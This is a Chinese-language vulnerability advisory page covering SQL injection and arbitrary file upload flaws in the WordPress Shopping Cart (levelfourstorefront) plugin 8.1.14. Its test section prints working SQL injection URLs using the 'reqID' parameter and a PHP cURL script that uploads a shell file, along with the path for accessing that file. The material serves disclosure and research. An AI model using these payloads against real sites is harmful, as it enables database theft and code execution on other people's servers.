Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / WordPress Shopping Cart插件多个SQL注入和任意文件上传漏洞

发布日期:2012-12-30
更新日期:2013-01-05受影响系统:
WordPress Shopping Cart 8.1.14
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57101
 
WordPress Shopping Cart插件是购物车系统,具有电子交易功能和管理工具。WordPress Shopping Cart插件内存在安全漏洞,没有正确验证wp-content/plugins/levelfourstorefront/scripts/administration/backup.php, wp-content/plugins/levelfourstorefront/scripts/administration/dbuploaderscript.php, wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php, wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php内的 "reqID" 参数值的合法性,可导致任意SQL代码执行和任意文件上传。
 
<*来源:Sammy Forgit
 
 链接:http://packetstormsecurity.com/files/119217/wplevelfour-sqlshell.txt
       http://www.securelist.com/en/advisories/51690
       http://www.opensyscom.fr/Actualites/wordpress-plugins-wordpress-shopping-cart-multiple-vulnerability.html
 *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
## Exploit SQL injection :
 
Database Wordpress :
 http://localhost/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/backup.php?reqID=1" or 1="1
 
Account XLS :
 http://localhost/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php?reqID=1" or 1="1
 
Subscriber XLS :
 http://localhost/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php?reqID=1" or 1="1
 ## Exploit Arbitrary File Upload:
 
PostShell.php
 <?php
 
$uploadfile = "lo.php";
     $force = "http://localhost/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/dbuploaderscript.php";
     $ch = curl_init("$force");
     curl_setopt($ch, CURLOPT_POST, true); 
      curl_setopt($ch, CURLOPT_POSTFIELDS,
                array("Filedata"=>"@$uploadfile",
           "reqID"=>"1"or 1="1"));
     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
     $postResult = curl_exec( $ch );
     curl_close($ch);
     
 print "$postResult";
 
?>
 Shell Access :
 http://localhost/wordpress/wp-content/plugins/levelfourstorefront/products/lo.php
 
lo.php
 <?php
 phpinfo();
 ?>
 
# Site : 1337day.com Inj3ct0r Exploit Database建议:
--------------------------------------------------------------------------------
厂商补丁:
 
WordPress
 ---------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
http://wordpress.org/extend/plugins/levelfourstorefront/Opera Web Browser 12.10之前版本SSL证书验证安全漏洞AVG AntiVirus for Android “Anti-theft”服务欺骗漏洞相关资讯      WordPress安全漏洞 
  • Wordpress Lazy SEO插件Shell上传  (09/23/2013 18:12:26)
  • WordPress crypt_private()远程拒  (06/30/2013 06:24:06)
  • WordPress ProPlayer 插件"id"参数  (05/23/2013 20:13:32)
  • WordPress HMS Testimonials 2.0.  (08/10/2013 14:28:41)
  • WordPress Image Slider with   (05/29/2013 19:27:42)
  • WordPress WP Cleanfix 插件"  (05/21/2013 19:36:23)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款
    版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图